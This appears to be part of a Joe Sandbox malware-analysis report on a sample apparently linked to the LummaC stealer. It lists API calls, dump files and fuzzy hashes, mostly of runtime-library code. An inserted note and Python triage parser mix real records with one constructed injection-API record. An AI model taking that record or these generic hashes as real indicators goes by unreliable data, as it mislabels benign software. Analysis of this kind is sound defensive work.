                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002C9989
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002C998F
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002C999F
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 127012223-0
                                                                                                                                                                                                                                        • Opcode ID: dae86bab31de10aedc86de53b7564aa73a03c62dad8df4c49e1b3b924c73ffaf
                                                                                                                                                                                                                                        • Instruction ID: 45def58a13224a00156af302ea12e99d0ee4744cc8fbcf630a1fe10a7ecd045e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dae86bab31de10aedc86de53b7564aa73a03c62dad8df4c49e1b3b924c73ffaf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A71087293120A6FDF219F648C89FAFB7B9EF46310F15031DE908A7142DA759CA4CB51
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 002ADECC
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002ADEF8
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 002ADF37
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002ADF54
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002ADF93
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002ADFB0
                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 002ADFF2
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 002AE015
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2040435927-0
                                                                                                                                                                                                                                        • Opcode ID: 7e9e15526ce7345b4d4ef09dc679350a0ee5d8169c094c95f1d0f78230488242
                                                                                                                                                                                                                                        • Instruction ID: 5953da72a4d21e45971c979b69eb9f96989744b40ee20e649fe5458d8ddd4ff8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e9e15526ce7345b4d4ef09dc679350a0ee5d8169c094c95f1d0f78230488242
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C451C07292020BAFEF208F60DC45FAB7BA9EF46780F154429F916E6150DFB4DD218B50
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                                                                                        • Opcode ID: 90a798cb3167070a9428d5a8ad016659465e7669ef58dc39ee64ab71c5640075
                                                                                                                                                                                                                                        • Instruction ID: 180e5ac06706b3467487e35fd0a98064ccc48ad8d2c1cde99aaf044395474790
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90a798cb3167070a9428d5a8ad016659465e7669ef58dc39ee64ab71c5640075
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17B16A32E247569FDB11CF28CC82BEE7BA5EF55390F144165E904AB282F374D961CBA0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002AEE37
                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 002AEE3F
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002AEEC8
                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 002AEEF3
                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002AEF48
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                        • Opcode ID: a6c45bcf7ff79fb168370134c1cef7bff24d0ff25363e656b8a190be59acd7b5
                                                                                                                                                                                                                                        • Instruction ID: 8b48c03b2c545f4d099e90daf337b5b9dfa60ae25d1cfec16a8da2d2292c58a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6c45bcf7ff79fb168370134c1cef7bff24d0ff25363e656b8a190be59acd7b5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF41E830E20219AFCF10DF68C885A9EBBB5EF46324F158155E8149B352CB31DE22CF92
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002ADD3B
                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00000008,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000,00000000,00000000), ref: 002ADD5A
                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000), ref: 002ADD88
                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000), ref: 002ADDE3
                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,002CAD5D,000000FF,00000000,002A9652,?,?,?,?,?,?,00000000), ref: 002ADDFA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set
                                                                                                                                                                                                                                        • API String ID: 66001078-3882152299
                                                                                                                                                                                                                                        • Opcode ID: 9fd14ce21d1e21f57b2d7da7bdfba27134633bd8a20dfa49bf16db602f27276f
                                                                                                                                                                                                                                        • Instruction ID: 573ea131474d8e7ae42b36d1736daa81c00a0a3ca906362a62bcebb0aba576d3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fd14ce21d1e21f57b2d7da7bdfba27134633bd8a20dfa49bf16db602f27276f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B414931920A06DFCB20DF65D684AAAF3F4FF1A310B50492AD457DB950DB30EEA5CB50
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002AE142
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 002AE150
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 002AE161
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                        • Opcode ID: 2103449a81373f7a349bdb4bb54455197791b4cc648fb741bc3655b5ffb13a7a
                                                                                                                                                                                                                                        • Instruction ID: 700035741b7d7bc86205dd0d63477a797a386e104c5dd6db236b7aa9eadc0881
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2103449a81373f7a349bdb4bb54455197791b4cc648fb741bc3655b5ffb13a7a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65D0C976D67224AF8340EFB4FE0DD8A7BB4EB0E7523118523F905D2760EB748D148A96
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
APIs
• _strlen.LIBCMT ref: 002A589C
• Concurrency::cancel_current_task.LIBCPMT ref: 002A5A5B
Similarity
• API ID: Concurrency::cancel_current_task_strlen
• String ID: ,$false$true
• API String ID: 575380510-760133229
APIs
• GetLastError.KERNEL32(?,?,002B965B,002AEBD7,002AD9C8), ref: 002B9672
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002B9680
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002B9699
• SetLastError.KERNEL32(00000000,002B965B,002AEBD7,002AD9C8), ref: 002B96EB
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• type_info::operator==.LIBVCRUNTIME ref: 002BA04B
• CallUnexpected.LIBVCRUNTIME ref: 002BA2C4
Similarity
• API ID: CallUnexpectedtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 2673424686-393685449
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 002A3BFC
• std::_Lockit::_Lockit.LIBCPMT ref: 002A3C1A
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A3C3C
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A3CAA
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_
• String ID: ios_base::badbit set
• API String ID: 593203224-3882152299
APIs
• __EH_prolog3.LIBCMT ref: 002AA5AD
• std::_Lockit::_Lockit.LIBCPMT ref: 002AA5BA
• std::_Lockit::_Lockit.LIBCPMT ref: 002AA624
• std::_Lockit::~_Lockit.LIBCPMT ref: 002AA63E
  • Part of subcall function 002A9CA8: _Yarn.LIBCPMT ref: 002A9CC8
  • Part of subcall function 002A9CA8: _Yarn.LIBCPMT ref: 002A9CEC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Yarn$H_prolog3Lockit::~_
• String ID: bad locale name
• API String ID: 3084819986-1405518554
• Opcode ID: 11c105e993174107b69decc6215d65d82af9e7a6112b0a07509a54b55b475e0e
• Instruction ID: 3af553b0a4827cc922da94e007db35de4fede5fe8aeaa181ef61ecdb39fb5eaf
• Opcode Fuzzy Hash: 11c105e993174107b69decc6215d65d82af9e7a6112b0a07509a54b55b475e0e
• Instruction Fuzzy Hash: ED11D071825744DFC720DF6AD48168ABBE4FF29700F50496FE08AC3641DB70AA90CFA6
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,DAA4AEFB,?,?,00000000,002CAD7A,000000FF,?,002B41AA,00000002,?,002B4246,002B6EA9), ref: 002B411E
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002B4130
• FreeLibrary.KERNEL32(00000000,?,?,00000000,002CAD7A,000000FF,?,002B41AA,00000002,?,002B4246,002B6EA9), ref: 002B4152
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: c7df588da4af804b74e43aee09cece0aa343e497dd9b697eddff33dde88f2a01
• Instruction ID: b6b09784d75be9d6941b5f2184bffbb0c2e64dc68850ab3ca4df1e9c4b0ace3f
• Opcode Fuzzy Hash: c7df588da4af804b74e43aee09cece0aa343e497dd9b697eddff33dde88f2a01
• Instruction Fuzzy Hash: F901DF31D61619AFDB019F54EC48FEEBBB8FB04B11F044126E811A26A0CB749D00CA90
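A triage note on the entries in this part of the report. The GetModuleHandleExW("mscoree.dll") / GetProcAddress("CorExitProcess") / FreeLibrary sequence is the MSVC C runtime's managed-exit hook (the CRT checks whether the CLR is loaded before calling ExitProcess), and the std::_Lockit, _Yarn, __alloca_probe_16 and __freea entries are statically linked CRT/STL code (IDA's FLIRT signatures label them LIBCMT and LIBCPMT). Their opcode and instruction hashes will match any MSVC-built binary, so they are poor LummaC indicators and should not be promoted into detection content. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses function records in the layout this page uses and separates runtime-library entries from ones worth manual review. The record text is copied from this page (argument lists trimmed) plus one hypothetical record, constructed here and not from this report, to show the "review" outcome; the classification rules are this example's own heuristics, not Joe Sandbox logic.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# IDA FLIRT module names for statically linked MSVC CRT / STL code.
RUNTIME_MODULES = {"LIBCMT", "LIBCPMT"}

# "• Name.MODULE(args), ref: ..." with an optional "Part of subcall function X:" prefix.
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[^\s(]+?)\.(?P<module>[A-Z0-9]+)(?=[\s(,]|$)"
)
# "• Key: value" lines of the Similarity block (value may be empty).
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<value>.*)$")

# Constructed sample: two records copied from this page (trimmed) and one
# hypothetical record that is NOT from this report.
SAMPLE_RECORDS = """\
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,DAA4AEFB), ref: 002B411E
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002B4130
• FreeLibrary.KERNEL32(00000000,?,?,00000000,002CAD7A,000000FF), ref: 002B4152
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• __alloca_probe_16.LIBCMT ref: 002BC10B
• __freea.LIBCMT ref: 002BC23B
  • Part of subcall function 002BA8D1: RtlAllocateHeap.NTDLL(00000000,002BC8AA), ref: 002BA903
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
Similarity
• API ID: __freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 1423051803-0
APIs
• VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00401000
• WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00401020
Similarity
• API ID: AllocMemoryProcessVirtualWrite
• String ID:
"""


@dataclass
class ApiCall:
    name: str
    module: str
    subcall: bool  # True for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    def direct_calls(self) -> List[ApiCall]:
        return [c for c in self.calls if not c.subcall]


def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into records; each record starts at an 'APIs' heading."""
    records: List[FunctionRecord] = []
    current = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            section = "apis"
            continue
        if line in ("Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = line
            continue
        if current is None:
            continue
        if section == "apis":
            m = API_LINE.match(raw)
            if m:
                current.calls.append(ApiCall(m["name"], m["module"], bool(m["sub"])))
        elif section == "Similarity":
            m = FIELD_LINE.match(raw)
            if m:
                current.fields[m["key"]] = m["value"]
    return records


def triage(rec: FunctionRecord) -> str:
    """Heuristic label: CRT exit hook, pure runtime-library code, or needs review."""
    direct = rec.direct_calls()
    if not direct:
        return "empty"
    names = {c.name for c in direct}
    strings = rec.fields.get("String ID", "")
    # MSVC CRT managed-exit hook: resolve CorExitProcess from mscoree.dll, then free it.
    if {"GetModuleHandleExW", "GetProcAddress", "FreeLibrary"} <= names and "CorExitProcess" in strings:
        return "crt-cor-exit"
    # Only direct calls count; subcalls of CRT helpers (e.g. RtlAllocateHeap) are expected.
    if all(c.module in RUNTIME_MODULES for c in direct):
        return "runtime-library"
    return "review"


def summarize(text: str) -> List[tuple]:
    return [(r.fields.get("API ID", ""), triage(r)) for r in parse_records(text)]


if __name__ == "__main__":
    for api_id, label in summarize(SAMPLE_RECORDS):
        print(f"{label:16} {api_id}")
```

Run against the full report text, the "review" bucket is the list to open in IDA; everything labelled runtime-library or crt-cor-exit is compiler output that the fuzzy hashes will also match in benign MSVC binaries.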
APIs
• __alloca_probe_16.LIBCMT ref: 002BC10B
• __alloca_probe_16.LIBCMT ref: 002BC1D4
• __freea.LIBCMT ref: 002BC23B
  • Part of subcall function 002BA8D1: RtlAllocateHeap.NTDLL(00000000,002BC8AA,?,?,002BC8AA,00000220,?,00000000,?), ref: 002BA903
• __freea.LIBCMT ref: 002BC24E
• __freea.LIBCMT ref: 002BC25B
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 1423051803-0
• Opcode ID: be77274d9ef13d6bf193f9dec736e2fdb0d1ae94e27a6f40a30eed253de09f58
• Instruction ID: 3249730c1d86981659a6255e2d89b97081cbacc89f9eb932551e39a92e815a88
• Opcode Fuzzy Hash: be77274d9ef13d6bf193f9dec736e2fdb0d1ae94e27a6f40a30eed253de09f58
• Instruction Fuzzy Hash: 2451A47262024AAFEF219FA4CC45DFB36A9EF85790F250529FD08D6141EB70DD309AA0
APIs
• __EH_prolog3.LIBCMT ref: 002AB85E
• std::_Lockit::_Lockit.LIBCPMT ref: 002AB868
• int.LIBCPMT ref: 002AB87F
  • Part of subcall function 002AA613: std::_Lockit::_Lockit.LIBCPMT ref: 002AA624
  • Part of subcall function 002AA613: std::_Lockit::~_Lockit.LIBCPMT ref: 002AA63E
• codecvt.LIBCPMT ref: 002AB8A2
• std::_Lockit::~_Lockit.LIBCPMT ref: 002AB8D9
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
• String ID:
• API String ID: 3716348337-0
• Opcode ID: dba0470d757bf0ac08118c788bfbd3276c1bf33611830861f6ae124fc3946a5e
• Instruction ID: 8d850d3751d76758f3a4042c6656202da125f311a65c64c3d96755402f5ca393
• Opcode Fuzzy Hash: dba0470d757bf0ac08118c788bfbd3276c1bf33611830861f6ae124fc3946a5e
• Instruction Fuzzy Hash: F2012632C241199FCF05EF68D8556ADB779BF46324F14480AE40167282DF789E21CF91
APIs
• __EH_prolog3.LIBCMT ref: 002A9ED5
• std::_Lockit::_Lockit.LIBCPMT ref: 002A9EE0
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A9F4E
  • Part of subcall function 002A9DA2: std::locale::_Locimp::_Locimp.LIBCPMT ref: 002A9DBA
• std::locale::_Setgloballocale.LIBCPMT ref: 002A9EFB
• _Yarn.LIBCPMT ref: 002A9F11
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
